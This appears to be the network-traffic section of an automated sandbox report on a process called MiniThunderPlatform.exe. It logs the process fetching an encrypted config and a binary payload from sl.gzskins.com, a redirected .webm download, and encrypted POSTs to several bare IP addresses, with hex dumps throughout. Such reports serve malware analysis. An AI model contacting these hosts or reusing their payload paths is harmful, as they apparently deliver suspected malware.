                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 55 52 4c 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
                                                                                                                                            Nov 6, 2024 16:40:30.964068890 CET161OUTGET /SLServerConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:31.273690939 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 4310
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            x-oss-request-id: 672B810553726E3132A019E7
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: Jr+I4nMytCTYtGoBNfZdvg==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache6.l2cn3107[15,14,304-0,H], cache63.l2cn3107[16,0], kunlun5.cn7174[0,0,200-0,H], kunlun3.cn7174[1,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "26BF88E27332B424D8B46A0135F65DBE"
                                                                                                                                            Last-Modified: Tue, 05 Nov 2024 13:12:30 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 7128468848774176665
                                                                                                                                            Age: 3306
                                                                                                                                            Ali-Swift-Global-Savetime: 1730904325
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076311465336e
                                                                                                                                            Data Raw: 1e fb 07 15 11 04 f8 ea 9e 99 5f 6c a0 a0 4d 57 b7 b9 42 59 98 e0 77 11 8c a3 7e 5b b5 b1 45 4c ac be 4b 63 9e 99 5f 7b ab b1 4e 52 a0 80 59 4c a6 b8 4d 4d a0 8d 1c 65 ea 99 5f 7b ab b1 4e 52 a0 80 59 4c a6 b8 4d 4d a0 8d 77 79 9f 96 40 5f a2 8d 60 0d b9 9c 1e 06 b9 9c 1e 0f b9 9c 1d 42 89 e2 50 72 f1 ac 77 11 82 8a 6a 52 a4 b7 71 65 82 8a 6a 52 a4 b7 6f 56 a4 bd 5c 57 aa be 71 68 f0 8f 7f 51 ab b1 73 7a 8f e1 50 68 f0 8f 7f 51 ab b1 73 7a 8f e2 50 68 f0 8f 7f 51 ab b1 73 7a 8f e3 50 68 f7 8f 6b 5f b7 b5 42 61 f4 e3 50 68 f4 8f 7e 4b a8 b2 40 5b 9a e3 50 65 ea 97 76 78 a9 b1 4b 7d ad b1 41 4e ac bf 42 63 9e 83 59 4e b5 bf 5e 4a 93 b5 5e 63 f4 e4 02 0c f4 8b 03 6d b0 a0 5c 51 b7 a4 7a 5b b7 8d 77 7f b5 a0 6d 4d b6 b5 58 4d 98 83 60 7f b5 a0 6d 4d b6 b5 58 4d f4 e0 1d 65 ea 91 5c 4e 84 a3 5f 5b b1 a3 71 65 86 bf 5e 5b 84 a3 5f 5b b1 a3 71 6d 89 93 43 4c a0 91 5f 4d a0 a4 5f 0c f0 e4 77 11 86 bf 5e 5b 84 a3 5f 5b b1 a3 71 65 8c a3 7f 55 ac be 6f 51 b7 b5 69 46 98 e0 77 11 8c a3 7f 55 ac be 6f 51 b7 b5 [TRUNCATED]
                                                                                                                                            Data Ascii: _lMWBYw~[ELKc_{NRYLMMe_{NRYLMMwy@_`BPrwjRqejRoV\WqhQszPhQszPhQszPhk_BaPh~K@[PevxK}ANBcYN^J^cm\Qz[wmMXM`mMXMe\N_[qe^[_[qmCL_M_w^[_[qeUoQiFwUoQiFoQmM
                                                                                                                                            Nov 6, 2024 16:40:31.273721933 CET1236INData Raw: 58 4d 80 a8 71 6d 89 93 43 4c a0 91 5f 4d a0 a4 5f 7b bd e2 19 0a 9e ff 6f 51 b7 b5 6d 4d b6 b5 58 4d 80 a8 71 65 86 bf 5e 5b 84 a3 5f 5b b1 a3 69 46 81 b1 58 63 96 9c 6f 51 b7 b5 6d 4d b6 b5 58 4d 80 a8 68 5f b1 e2 18 0c 9e ff 6f 51 b7 b5 6d 4d
                                                                                                                                            Data Ascii: XMqmCL_M_{oQmMXMqe^[_[iFXcoQmMXMh_oQmMXMh_wh__hqm\NX_w\zMM^c\NX_^RXJEPTCRVWO|_@WYP`||ij{mh
                                                                                                                                            Nov 6, 2024 16:40:31.273736000 CET424INData Raw: 40 52 a4 a3 63 58 a3 a3 49 4a f7 8d 1a 0c f6 e1 1e 06 f5 8b 03 6e a4 bc 40 5f b6 9f 4a 58 b6 b5 58 0c 98 8b 7c 5f a9 bc 4d 4d 8a b6 4a 4d a0 a4 1f 63 f2 e3 15 0d f2 e4 18 65 ea 80 4d 52 a9 b1 5f 71 a3 b6 5f 5b b1 e3 71 65 95 b1 40 52 a4 a3 63 58
                                                                                                                                            Data Ascii: @RcXIJn@_JXX|_MMJMceMR_q_[qe@RcXIJn@_JXXyLI\X[XJ[IGW]k{[EJwkhQ@QqV\MIMBFO[PMZXSkhQ@Qqe@mZWqV\M]X
                                                                                                                                            Nov 6, 2024 16:40:31.273753881 CET24INData Raw: 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0 1c 0e f5 e0
                                                                                                                                            Data Ascii:
                                                                                                                                            Nov 6, 2024 16:40:38.442290068 CET142OUTGET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:38.834227085 CET569INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:38 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache27.l2cn3130[62,62,403-1280,M], cache61.l2cn3130[67,0], kunlun7.cn7174[82,81,403-1280,M], kunlun3.cn7174[84,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907638
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:38 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076386235405e
                                                                                                                                            Nov 6, 2024 16:40:38.844647884 CET159OUTGET /SLAppAssets101.to HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:39.178335905 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 315734
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 14:58:04 GMT
                                                                                                                                            x-oss-request-id: 672B83FC818A3130376A4DFC
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: 8/Mz7Iph5UI1uAJBsA9FeA==
                                                                                                                                            x-oss-server-time: 19
                                                                                                                                            Via: cache2.l2cn3130[0,0,304-0,H], cache13.l2cn3130[2,0], kunlun7.cn7174[14,24,200-0,H], kunlun3.cn7174[27,0]
                                                                                                                                            ETag: "F3F333EC8A61E54235B80241B00F4578"
                                                                                                                                            Last-Modified: Wed, 23 Oct 2024 12:14:12 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 7414391600638129604
                                                                                                                                            Age: 2555
                                                                                                                                            Ali-Swift-Global-Savetime: 1730905084
                                                                                                                                            X-Cache: HIT TCP_REFRESH_HIT dirn:9:211679714
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:39 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076390247160e
                                                                                                                                            Data Raw: ea ea 47 eb 10 15 b8 14 45 5d f4 50 46 51 f0 5c 1f 57 f6 58 ce ec 66 d5 31 24 d3 73 78 72 99 34 30 35 99 34 31 35 99 35 ce ef 99 76 31 3e 9e 32 39 33 9f 3f 39 3c 91 3e 3b 3e 92 3b 29 24 97 38 3c 3a 84 20 27 25 81 16 2e 11 bd 17 2e 16 b8 13 1a 03 b6 13 18 00 b0 14 13 04 d8 04 05 0d a2 0b 0f 0a bc 1b 75 7d da 09 79 03 a4 0b 0a cb 42 35 72 35 93 3e 3a 3a 94 3b 2d 24 89 29 0a 1c bb 1d 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f a2 0e 0a 0f 66 f5 31 25 91 37 e1 31 99 36 30 16 99 37 20 35 9a 24 30 cb 5d 35 2a 34 99 36 30 35 98 34 30 34 99 35 31 34 99 35 31 34 99 34 33 37 9d 30 37 33 66 f1 31 71 89 35 33 36 98 36 32 36 9a 30 37 30 9d 30 35 35 9c 35 30 36 88 36 35 26 b8 30 00 75 c8 54 22 16 e8 33 03 b5 08 94 25 76 cb 84 f0 e5 ba 06 53 d5 8c 76 43 c4 9e 11 62 b6 68 01 a3 f6 4b 56 93 22 bc 00 83 cb 5d 35 2b 35 98 34 30 35 98 34 30 34 99 35 31 34 99 35 31 34 99 34 33 37 9d 30 37 cb 5d 35 1b 25 98 34 30 35 99 37 33 36 [TRUNCATED]
                                                                                                                                            Data Ascii: GE]PFQ\WXf1$sxr4054155v1>293?9<>;>;)$8<: '%..u}yB5r5>::;-$)f1%71607 5$0]5*4605404514514437073f1q53662607005550665&0uT"3%vSvCbhKV"]5+540540451451443707]5%4057367366144 6


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.1057263107.148.237.1808156C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:26.325428963 CET344OUTGET /d/PanAlistPhoto/SLBox241019_2.webm HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: skinx.x1.lolgezi.cc
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Referer: http://skinx.x1.lolgezi.cc/d/PanAlistPhoto
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                                                                                                                            Nov 6, 2024 16:40:28.061156988 CET1236INHTTP/1.1 302 Found
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:27 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Content-Length: 1457
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate
                                                                                                                                            Location: https://bjbgp01.baidupcs.com/file/0a382c0d6mc9d86e83dea8b6b711ec95?bkt=en-2e2b5030dd6ff03724ec2636891713b04491a2164193080372eba2827f42e3f49512226682b607da&fid=1103614021113-16051585-374161435003679&time=1730907627&sign=FDTAXUbGERQlBHSKfWqi-DCb740ccc5511e5e8fedcff06b081203-bBuDqT9nQKxRogvr657%2Fscy9g38%3D&to=75&size=28631040&sta_dx=28631040&sta_cs=283&sta_ft=webm&sta_ct=3&sta_mt=3&fm2=MH%2CBaoding%2CAnywhere%2C%2CNone%2Cany&ctime=1729845141&mtime=1729845141&dt3=23&resv0=-1&resv1=0&resv2=rlim&resv3=5&resv4=28631040&vuk=1103614021113&iv=0&vl=1&htype=&randtype=&tkbind_id=0&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=en-f0f082f0b29a322597b31898254f83c518207a420c13082998b3ef207def286c7bf2617df2ab6dfe&expires=8h&rt=pr&r=940755097&mlogid=7212653381263636982&vbdid=-&fin=SLBox241019_2.webm&fn=SLBox241019_2.webm&err_ver=1.0&rtype=1&clienttype=70&dp-logid=7212653381263636982&dp-callid=0.1.1&hps=1&tsl=0&csl=0&fsl=-1&csign=pnawazyXxvhDSfXVs1mpjf37Nwk%3D&so=0&ut=6&uter=4&serv=1&uc=280221178&ti=12146e4ff
                                                                                                                                            Data Raw:
                                                                                                                                            Data Ascii:
                                                                                                                                            Nov 6, 2024 16:40:28.061285019 CET316INData Raw: 37 64 66 33 63 39 63 38 34 35 64 32 61 31 62 39 31 35 39 65 34 30 32 63 32 31 62 66 35 34 30 63 34 62 37 35 36 39 26 68 66 6c 61 67 3d 33 30 26 66 72 6f 6d 5f 74 79 70 65 3d 31 26 61 64 67 3d 6e 26 72 65 71 6c 61 62 65 6c 3d 31 36 30 35 31 35 38
                                                                                                                                            Data Ascii: 7df3c9c845d2a1b9159e402c21bf540c4b7569&hflag=30&from_type=1&adg=n&reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&fpath=_pcs_.appdata%2Fyoua%2Fweb&by=themisReferrer-Policy: no-referrerX-Cache: MISS
                                                                                                                                            Nov 6, 2024 16:40:28.061297894 CET1236INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 6a 62 67 70 30 31 2e 62 61 69 64 75 70 63 73 2e 63 6f 6d 2f 66 69 6c 65 2f 30 61 33 38 32 63 30 64 36 6d 63 39 64 38 36 65 38 33 64 65 61 38 62 36 62 37 31 31 65 63 39 35 3f 62 6b 74 3d 65 6e
                                                                                                                                            Data Ascii: <a href="https://bjbgp01.baidupcs.com/file/0a382c0d6mc9d86e83dea8b6b711ec95?bkt=en-2e2b5030dd6ff03724ec2636891713b04491a2164193080372eba2827f42e3f49512226682b607da&amp;fid=1103614021113-16051585-374161435003679&amp;time=1730907627&amp;sign=FDT
                                                                                                                                            Nov 6, 2024 16:40:28.061309099 CET212INData Raw: 62 39 31 35 39 65 34 30 32 63 32 31 62 66 35 34 30 63 34 62 37 35 36 39 26 61 6d 70 3b 68 66 6c 61 67 3d 33 30 26 61 6d 70 3b 66 72 6f 6d 5f 74 79 70 65 3d 31 26 61 6d 70 3b 61 64 67 3d 6e 26 61 6d 70 3b 72 65 71 6c 61 62 65 6c 3d 31 36 30 35 31
                                                                                                                                            Data Ascii: b9159e402c21bf540c4b7569&amp;hflag=30&amp;from_type=1&amp;adg=n&amp;reqlabel=16051585_d_831b808e43ac56a7fd3c1706a38d91ab_-1_769817cf1ab77604e3ebedabfe8c530f&amp;fpath=_pcs_.appdata%2Fyoua%2Fweb&amp;by=themis">Fou
                                                                                                                                            Nov 6, 2024 16:40:28.065299988 CET9INData Raw: 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                            Data Ascii: nd</a>.


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.1057267140.206.225.136808156C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:26.855175018 CET334OUTPOST / HTTP/1.1
                                                                                                                                            Host: 140.206.225.136:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 204
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3c 00 00 00 07 00 00 00 c0 00 00 00 99 88 68 20 9c 43 74 48 97 50 1d f1 2d d5 f4 78 3c 1e b2 2a 11 00 81 15 c0 ec 9d c4 84 c7 f2 5d 2e c5 17 44 1b af a5 d7 4f df 9a e6 1b 81 13 66 8b 8b c3 20 62 d2 f7 f8 9d b7 f4 f7 e7 7d d8 e4 3b 37 fc 98 57 e3 8b 6d f8 a7 fb 4b 6f 91 dd ac 00 83 d3 b9 9b 34 05 24 ce f0 d5 2a 14 7c 75 74 16 82 5a 18 22 c3 3b bb 8f a5 5d 35 26 92 05 6f 6e 84 b6 38 53 ef d3 aa 23 66 e9 6d b6 09 35 42 c5 58 de 33 86 9c 0e 9a 31 65 ed c5 9b a9 44 4d ba 23 91 9d 94 e9 02 81 9b ca d6 9b f0 db 65 31 02 8d 83 9c b4 20 e3 ec d5 c7 c6 be 75 9d d1 85 57 27 00 7d b4 42 21 81 fb f5 dd d5 52 93 a2 61
                                                                                                                                            Data Ascii: <h CtHP-x<*].DOf b};7WmKo4$*|utZ";]5&on8S#fm5BX31eDM#e1 uW'}B!Ra
                                                                                                                                            Nov 6, 2024 16:40:27.897969007 CET98INHTTP/1.1 200 OK
                                                                                                                                            Content-Length: 28
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Connection: Close
                                                                                                                                            Nov 6, 2024 16:40:28.120946884 CET28INData Raw: 3c 00 00 00 07 00 00 00 10 00 00 00 dc 5b 4f 23 c2 53 d9 2a d2 b3 a0 fb 5f 88 31 01
                                                                                                                                            Data Ascii: <[O#S*_1


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.1057268112.64.218.154808156C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:27.365211010 CET381OUTPOST / HTTP/1.1
                                                                                                                                            Host: 112.64.218.154:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 252
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3d 00 00 00 01 00 00 00 f0 00 00 00 e8 77 c7 8b 4a 2e 9d c0 e6 9f 60 9d 1a 49 b4 ea 99 de eb fb ac 60 4f ba d0 1a e1 3d 44 c5 0f 22 e8 53 5f 6f 59 e3 a8 03 2e f3 4e 36 27 e0 af fd 5b 86 33 00 92 ee d9 2a 21 4c 98 40 60 df 80 9b 04 69 a7 fe 77 e0 5c 89 8b 51 78 a6 58 6a 9d 85 00 3a 3f 45 62 52 6e 70 68 bb fa 16 76 26 db c8 84 6b 09 63 2f 91 12 1e ce 53 d6 88 ce 77 b1 a8 de f9 35 dc 8a c3 47 b4 10 55 bd b9 19 cf 35 ba a6 a9 c1 4b 4c ef d4 3f a4 78 8a 6f 9b 6e 58 bf a3 69 d6 ab fb dd 3d f4 33 0b 39 45 58 2a b6 9f 79 5b 53 fc dc 04 0d 6b 8f 83 ae d5 05 92 19 55 88 1b bd 10 9d 8f 6b 05 e3 98 6a ef 10 4f 52 74 40 0c cb 58 61 97 82 a8 bb a4 df b1 0b ed ac 71 a0 3e ff d6 6a 6b 95 54 9e d7 05 47 28 85 c5 9c 35 81 44 39 be bd 67 19 59 be 0c f8 5f fb 00 7c
                                                                                                                                            Data Ascii: =wJ.`I`O=D"S_oY.N6'[3*!L@`iw\QxXj:?EbRnphv&kc/Sw5GU5KL?xonXi=39EX*y[SkUkjORt@Xaq>jkTG(5D9gY_|
                                                                                                                                            Nov 6, 2024 16:40:28.425626040 CET1236INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:28 GMT
                                                                                                                                            Content-Type: text/plain
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Content-Length: 1804
                                                                                                                                            Data Raw: 3d 00 00 00 01 00 00 00 00 07 00 00 e8 77 c7 8b 4a 2e 9d c0 e6 9f 60 9d 1a 49 b4 ea 99 de eb fb ac 60 4f ba d0 1a e1 3d 44 c5 0f 22 e8 53 5f 6f 59 e3 a8 03 2e f3 4e 36 27 e0 af fd 18 3d 18 6b d7 f9 50 6d 99 34 51 08 4c ef 69 bc 35 95 c3 76 80 af 62 8e 04 99 38 26 34 74 b5 18 7a c7 c4 34 14 8c 61 7f 02 00 52 bc bd 01 ae 99 c4 2f 49 18 79 7d 98 57 5d f0 b3 05 5a 7b 4d b5 6f 64 c5 46 0b 65 2c 26 6c b4 78 34 83 fc d9 67 98 b7 06 c2 6d 97 f1 a3 16 20 31 34 77 8a 71 82 cf 74 18 04 26 c8 cf c7 7a 17 34 9f e1 97 13 9e a8 23 08 3a 62 7d ec 2b be f6 ba e0 c5 40 cd a1 98 1e 9c 0a 3c 1d c6 22 8b 9b d9 11 c9 12 37 95 4b c7 9d 0d 05 9c ae dc 47 a1 cc 8b be 69 f9 da 1c de f2 99 1d 99 a2 82 dd 7c 52 18 20 73 43 71 11 00 35 fb d5 1a bb e4 a7 df 0f 44 ec ba 36 c4 26 ab ef d6 63 56 91 55 8a 8a 2d e0 68 62 09 d6 12 93 db 5e 50 6f f0 1f f6 94 c4 16 96 fb c3 34 c7 5d 24 35 45 10 67 eb 73 3b a2 cf 59 bd 1c 68 bb 2f 56 72 72 13 aa b9 42 24 66 84 47 53 2b d5 ae 47 a7 56 89 b1 2e b1 d0 f5 62 61 1b c0 fb 19 34 3a ad 42 68 54 [TRUNCATED]
                                                                                                                                            Data Ascii: =wJ.`I`O=D"S_oY.N6'=kPm4QLi5vb8&4tz4aR/Iy}W]Z{ModFe,&lx4gm 14wqt&z4#:b}+@<"7KGi|R sCq5D6&cVU-hb^Po4]$5Egs;Yh/VrrB$fGS+GV.ba4:BhT<F|3}F"sCO$yldeT>,-`U2IV-vc+^mmXGc#*dv|uws]FEfsNd^m0pYTMPE=#fi0H~`6uDvA?Qj|O,PFWX,<_)E2`hH[I@E{v,ZBxpCB|cK|w)`iZ[&9DZ*r&mD5+<C76wp(2cj2y g*\>]4;`1lcv|XVf#[T[DqX^-lFOs(DQ%?824)Mdy*.fh([DORc~xVS)`mup:$l)y<xQ=O1Naj:GX>lI;bd:qR0S:B+Cb7i8Sd;E^;2.X_I=m1=KMe1xJ+{$!tty [TRUNCATED]
                                                                                                                                            Nov 6, 2024 16:40:28.425759077 CET723INData Raw: 08 57 b1 26 a6 38 1f c1 53 51 6c e5 cc e8 1e cf 7e 36 04 97 32 0e 89 cb 81 44 4e be d7 75 09 61 8c 36 8f 19 03 fa 6d ab 5f c0 ba b7 20 b6 48 a5 ad 2e 14 c7 ca 15 44 fb b1 0f ef c0 db 22 a0 f5 32 97 70 48 c3 3d d7 9d e1 34 a3 3a 1a a3 75 1b 9f 1c
                                                                                                                                            Data Ascii: W&8SQl~62DNua6m_ H.D"2pH=4:uD,|:6DU|<i!^'N6#&{xm/cgb7AvPq:R:w0IM^a'ON"^.`lx4+P^3re!?&iaQp`q$y
                                                                                                                                            Nov 6, 2024 16:40:28.491256952 CET253OUTPOST / HTTP/1.1
                                                                                                                                            Host: 112.64.218.154:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 124
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3d 00 00 00 0f 00 00 00 70 00 00 00 72 77 0c 6c df 35 a2 47 3f 82 70 bd 80 00 82 29 e6 fc 19 08 5a 4a 4d 1c cd 3a 01 fc f9 f6 44 c7 d0 4f 95 8c be de fa 6e b7 b8 e6 e1 3c d7 35 df 10 97 c7 41 92 98 f7 6c 22 7e 49 ef 15 33 86 15 dc ec 89 fc b0 4d ab f2 8a f0 06 f9 c7 ae ee 8e 25 bb 32 cb 2e 8d d7 cd 12 f5 4f 1c 63 b9 48 60 fe aa bf a6 93 9d 04 22 c0 d0 01 ee 8b 5e b9 25
                                                                                                                                            Data Ascii: =prwl5G?p)ZJM:DOn<5Al"~I3M%2.OcH`"^%
                                                                                                                                            Nov 6, 2024 16:40:28.847060919 CET719INHTTP/1.1 404 Not Found
                                                                                                                                            Server: openresty/1.9.3.2
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 537
                                                                                                                                            Connection: keep-alive
                                                                                                                                            ETag: "5e673b37-219"
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe <a href="http://nginx.org/r/error_log">error log</a> for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.1057269116.132.218.191808156C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 6, 2024 16:40:27.377793074 CET318OUTPOST / HTTP/1.1
                                                                                                                                            Host: 116.132.218.191:80
                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                            Content-Length: 188
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Data Raw: 3c 00 00 00 05 00 00 00 b0 00 00 00 ae 7e 19 39 88 19 74 b9 b6 fc 4a 85 c2 48 da 14 80 eb 26 26 69 25 1a b4 5e 48 fd d6 f3 6c a3 bc 15 fa e0 f7 8d 56 17 9d 1a 1c 17 18 cb 11 c1 77 59 85 57 48 3e 09 11 0d 9a 12 fc 9d 14 78 24 75 01 c6 94 98 43 37 2e 67 83 c3 86 cc 7a 87 75 94 68 1c 00 48 da 81 80 22 75 a0 53 da bc eb a2 03 bb d9 a2 35 ba 13 37 55 a4 e8 bd e5 36 46 d0 09 6a 01 c2 c2 ae 5b 47 ed 4d f5 9a 3c a7 54 a4 21 47 fb d4 82 88 d5 2f e9 a3 92 28 e9 84 0d 42 66 e1 e1 c8 6f 22 35 ea 48 f0 9a cb f5 29 12 f1 10 45 22 8e 29 8d bc 83 df aa 9c a2 4a 40 b0 fe 7e
